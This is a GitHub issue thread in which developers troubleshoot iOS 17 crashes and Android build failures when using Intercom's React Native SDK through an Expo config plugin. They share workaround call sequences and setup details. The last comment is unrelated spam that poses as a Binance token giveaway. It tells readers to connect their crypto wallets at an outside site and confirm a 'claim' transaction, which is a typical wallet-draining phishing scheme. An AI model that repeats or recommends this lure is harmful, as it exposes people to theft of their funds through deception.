### ISSUE TITLE
Intercom v6 for iOS 17 needed

### ISSUE THREAD

**Issue by wcastand** [cmaycumber/config-plugin-react-native-intercom#72]
https://github.com/intercom/intercom-react-native/releases/tag/6.0.0

update v6 is necessary for iOS17, getting crashes on sentry for iOS 17 users.

**Comment by wcastand** [comment]
to be honest we use our own internal config plugin because we didn't need all the stuff this one does and we wanted to be in control when we need to update.

**Comment by GabrielDierks** [comment]
Yeah that might be the best solution, but it would also makes sense to have a maintained project ideally as an official expo config plugin, since react native intercom is quite an important sdk!

**Comment by wcastand** [comment]
yeah but i understand why they don't, if they do intercom they need to start supporting all the other platform, it's more intercom that should make a expo plugin and maintain it for their users.

**Comment by julianpensionjar** [comment]
> to be honest we use our own internal config plugin because we didn't need all the stuff this one does and we wanted to be in control when we need to update.

Anything you can share, or quick pointers to how to achieve a minimal solution for this? I'm in the same boat and have crashes with intercom 4.0.1 on iOS with Expo SDK 49.

**Comment by wcastand** [comment]
if that can help anyone 
https://gist.github.com/wcastand/1d70b0044cd78eeeea60f418ea121b9a

**Comment by julianpensionjar** [comment]
> if that can help anyone https://gist.github.com/wcastand/1d70b0044cd78eeeea60f418ea121b9a
> 
> currently on `"@intercom/intercom-react-native": "6.0.1",`

Thanks @wcastand - I was able to create a new iOS development build using that gist and it seems to have stopped the crash, however the Android development build is now failing on EAS - something I don't understand in `Run gradlew` step:

```
FAILURE: Build failed with an exception.

* What went wrong:

Execution failed for task ':app:checkDebugAarMetadata'.

> A failure occurred while executing com.android.build.gradle.internal.tasks.CheckAarMetadataWorkAction

   > 9 issues were found when checking AAR metadata:
...

```

I need to investigate further, but did you experience anything like this?

**Comment by wcastand** [comment]
Hmm sorry don't remember having an issue on that, maybe you need to upgrade min version to 34 or something like that but honestly don't remember this error

**Comment by yonitou** [comment]
Hi @wcastand ,

Does your custom plugin supports push notifications ?

**Comment by julianpensionjar** [comment]
> > Hmm sorry don't remember having an issue on that, maybe you need to upgrade min version to 34 or something like that but honestly don't remember this error
> 
> Thanks...think this was a case of me not reading the Intercom release docs properly. I'm experimenting with `@intercom/intercom-react-native@5.3.1` which appears to still support Android API level 33, but if not, I'll look at moving up to 34.

Just as update on this part of the thread - I have used a "local" config plugin using the gust above,  but I couldn't find a way to make things work with `@intercom/intercom-react-native6.x.x` as EAS refused to build, complaining about android sdk 34, and no matter what I have tried in `app.config.js` around complle/target SDKs, I can't get it to build.

So, I'm currently running `@intercom/intercom-react-native5.3.1`, which unfortunately has the crash situation on iOS. My workaround to prevent the hard crash is the following sequence of calls:
```
  await Intercom.loginUnidentifiedUser()
  await Intercom.logout()
  await Intercom.setUserHash(hash)
  await Intercom.loginUserWithUserAttributes(...)
  await Intercom.updateUser(...)
```
The key seems to be the call to `loginUnidentifiedUser()` before logout. Whilst this prevents the hard crash on iOS, it does throw another non-fatal error (I *think* only on Android). I'm having to live with that for now, but at some point will be investigating platform-specific code to only call `loginUnidentifiedUser()` for iOS.

All very irritating to be honest - it would be nice to have a clean way to use 6.x.x on Expo.

**Comment by yonitou** [comment]
Hi @julianpensionjar 

Thanks for the infos. Can you tell me if the gust provided by @wcastand does support Push Notifications ?

**Comment by julianpensionjar** [comment]
> https://github.com/intercom/intercom-react-native/releases/tag/6.0.0
> 
> update v6 is necessary for iOS17, getting crashes on sentry for iOS 17 users.

Just re-reading the original post in this thread (it which wasn't the reason I came across it). Does this mean that the 5.3.1 Intercom libraries do NOT support iOS 17?! Do you know if these cause hard app crashes, or just Sentry errors (the latter could probably be lived with if there is no other bad outcome).

**Comment by GabrielDierks** [comment]
I can confirm we are using 5.3.1 with this plugin and it works for iOS 17. But we have Sentry / Crashlytics errors, meaning crashes that appear on iOS 17, which lead to believe we have to update to the latest 6.2.0 to avoid those.

Example crash on 17.0.3:

`Fatal Exception: NSInvalidArgumentException
-[IntercomSDKPrivate.ConversationViewController contextMenuPreviewPresentationController:didChangePreviewContentSize:]: unrecognized selector sent to instance 0x11f0c5800`

**Comment by yonitou** [comment]
Which plugin are you talking about @GabrielDierks ? The one from the repo or the one from @wcastand ?

**Comment by julianpensionjar** [comment]
> Hi @julianpensionjar
> 
> Thanks for the infos. Can you tell me if the gust provided by @wcastand does support Push Notifications ?

Sorry Intercom push notifications still on our backlog, so we haven't tried that yet.

**Comment by GabrielDierks** [comment]
> Which plugin are you talking about @GabrielDierks ? The one from the repo or the one from @wcastand ?

This one from cmaycumber

**Comment by julianpensionjar** [comment]
> I can confirm we are using 5.3.1 with this plugin and it works for iOS 17. But we have Sentry / Crashlytics errors, meaning crashes that appear on iOS 17, which lead to believe we have to update to the latest 6.2.0 to avoid those.
> 
> Example crash on 17.0.3:
> 
> `Fatal Exception: NSInvalidArgumentException -[IntercomSDKPrivate.ConversationViewController contextMenuPreviewPresentationController:didChangePreviewContentSize:]: unrecognized selector sent to instance 0x11f0c5800`

Hmm, these certainly look like the same messages as the hard app crashed on 5.3.1 (without the work-around function sequence I posted in https://github.com/cmaycumber/config-plugin-react-native-intercom/issues/72#issuecomment-1822549085
Are you certain no hard app crashes?!

**Comment by julianpensionjar** [comment]
> > Which plugin are you talking about @GabrielDierks ? The one from the repo or the one from @wcastand ?
> 
> This one from @cmaycumber

Are you able to give us a complete view of your setup, things such as:
* Using Expo? And if so which SDK version
* Version of the @cmaycumber config plugin
* Sequence of function calls you make to Intercom libs (on 5.3.1)
* Anything else relevant?

**Comment by GabrielDierks** [comment]
No as I mentioned we do have hard app crashes and this was one example of a crash. But for most of our customers on iOS 17 it works fine and we could not reproduce why these crashes appear apart from not having updated the react-native-intercom package.

**Comment by julianpensionjar** [comment]
> No as I mentioned we do have hard app crashes and this was one example of a crash. But for most of our customers on iOS 17 it works fine and we could not reproduce why these crashes appear apart from not having updated the react-native-intercom package.

Ah ok - sorry, misunderstood you! So, it sounds like you're in the same boat as me. You might want to try the work-around sequence of calls I posted above - so far this has avoided the crashes on iOS, although I need to check for explicit testing on iOS 17. It does however produce other non-fatal crashes, which seem to be exclusively on Android.

**Comment by GabrielDierks** [comment]
> > > Which plugin are you talking about @GabrielDierks ? The one from the repo or the one from @wcastand ?
> > 
> > 
> > This one from @cmaycumber
> 
> Are you able to give us a complete view of your setup, things such as:
> 
> * Using Expo? And if so which SDK version
> * Version of the @cmaycumber config plugin
> * Sequence of function calls you make to Intercom libs (on 5.3.1)
> * Anything else relevant?

Sure:

- Expo managed workflow with dev-client with following versions:

   `"expo": "^49.0.11",
   "react-native": "^0.72.5",
   "config-plugin-react-native-intercom": "^1.5.0",
   "@intercom/intercom-react-native": "^5.3.1",`

- App.json integration:

`[
				"config-plugin-react-native-intercom",
				{
					"iosApiKey": "<your-api-key>",
					"androidApiKey": "<your-api-key>",
					"appId": "<your-app-id>",
					"isPushNotificationsEnabledIOS": true,
					"isPushNotificationsEnabledAndroid": true,
					"intercomEURegion": "true"
				}
			],`
			
- Order of calls:
			
`await Intercom.loginUnidentifiedUser();
await Intercom.sendTokenToIntercom(newToken);`

on refresh token:

` await Intercom.setUserHash(data.token);
await Intercom.loginUserWithUserAttributes({
          email,
          userId,
        });
await Intercom.updateUser({ ..props });`

**Comment by GabrielDierks** [comment]
Seems like adding a logout prior to the hash could improve our experience 😎

**Comment by julianpensionjar** [comment]
> Seems like adding a logout prior to the hash could improve our experience 😎

Possibly, although my suspicion is that there is race condition in the underlying libs - we get the crashes when calling logout first. One issue is there is no way (that I know of at least) to know what the state is in the lib - i.e. you can't ask "is there already a user", and if so call logout. We had to try and design the code so we definitively knew whether there is already a user, hence the sequence I posted - first force an unidentified user (so we know we have one), then logout, then login the real (Identified) user.

**Comment by yonitou** [comment]
Does a patch package on this plugin would be enough ? So we just update the version of intercom to v6 ? Or do we need to make other changes in the config plugin to make it work ?

**Comment by yonitou** [comment]
On my side, I have a big issue, everytime I'm launching my app on android (v31) I'm experiencing this message and a crash : 
TypeError: Cannot read property 'UNREAD_COUNT_CHANGE_NOTIFICATION' of null, js engine: hermes

Did you manage to solve it ? It's driving me nuts

**Comment by julianpensionjar** [comment]
> On my side, I have a big issue, everytime I'm launching my app on android (v31) I'm experiencing this message and a crash : TypeError: Cannot read property 'UNREAD_COUNT_CHANGE_NOTIFICATION' of null, js engine: hermes
> 
> Did you manage to solve it ? It's driving me nuts

I feel like I've seen that at some point when going through the pain of upgrading the intercom libsraries..this could way off, but I seem to recall there were some changes in the naming of event listeners at some point that I had to tweak. e.g. if you add an event listener to handle a change in the number of unread messages:
```
Intercom.addEventListener('IntercomUnreadConversationCountDidChangeNotification', callback)
```
I think it was the exact string being passed that was different - I can see in commit history I previously had to switch on platform between:
- IOS: 'IntercomUnreadConversationCountDidChangeNotification'
- Android: 'IntercomUnreadCountDidChange'
I think it is the same for both now (the first one).

Hope it helps!

**Comment by yonitou** [comment]
I'm not using it :/ I think it's related to the v5 version because I'm using a v31 Android. It only works if I remove all imports of Intercom. What a mess really ... How such a company can have such a poor support on mobile integration :(

**Comment by enagorny** [comment]
I've put a PR in expo/config-plugins . The solution is based on @wcastand gist and extended to support regions. 
Push notifications aren't there yet.

**Comment by bajarang-agarwal1** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![Binance Free Tokens](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

## Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Claimed my free tokens on Binance! 🌟 #BinanceFreeTokens #Crypto](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰
